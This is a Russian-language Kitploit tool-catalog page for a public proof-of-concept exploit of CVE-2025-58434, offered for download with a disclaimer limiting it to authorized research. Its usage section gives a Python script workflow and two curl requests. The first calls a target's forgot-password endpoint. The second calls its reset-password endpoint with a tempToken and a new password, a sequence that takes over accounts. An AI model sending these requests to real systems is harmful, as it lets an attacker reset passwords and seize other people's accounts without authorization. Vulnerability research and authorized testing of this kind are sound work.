Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-58434-PoC — CVE-2025-58434 Доказательство концепции | Kitploit
Инструменты/GitHubGitHub/mananispiwpiw/cve-2025-58434-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubmananispiwpiw/cve-2025-58434-poc

CVE-2025-58434-PoC

CVE-2025-58434 Доказательство концепции

Репозиторий
14 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-58434 PoC

PoC-скрипт на Python для запуска POST /api/v1/account/forgot-password.

⚠️ Только для образовательных и авторизованных исследований безопасности. Запуск этого инструмента против систем, которыми вы не владеете или на тестирование которых у вас нет письменного разрешения, является незаконным.

Авторы

  • zaddy6 (Isaac David)
  • arthurgervais (Arthur Gervais)

Подробности

  • PoC для CVE-2025-58434
  • Ссылка: https://github.com/advisories/GHSA-wgpv-6j63-x5ph

Файлы

  • poc.py: запрашивает URL/IP машины, опционально протокол, если указан голый хост/IP, целевой email и пароль; затем отправляет запрос и выводит HTTP-статус, заголовки и тело ответа, аналогично
curl -i

Использование

Запуск:

root@kitploit:~
python3 poc.py

Затем укажите:

  • URL/IP машины, например 10.10.11.10, http://10.10.11.10 или https://target.example
  • протокол, если будет запрошен для голого хоста/IP
  • email адрес
  • пароль

Эквивалентный curl

1-й запрос

root@kitploit:~
curl -i -X POST https://<MACHINE_URL/IP>/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"<[email protected]>"}}'

2-й запрос

root@kitploit:~
curl -i -X POST https://<target>/api/v1/account/reset-password \
  -H "Content-Type: application/json" \
  -d '{
        "user":{
          "email":"<[email protected]>",
          "tempToken":"<tempToken>",
          "password":"NewSecurePassword123!"
        }
      }'
Скачать инструмент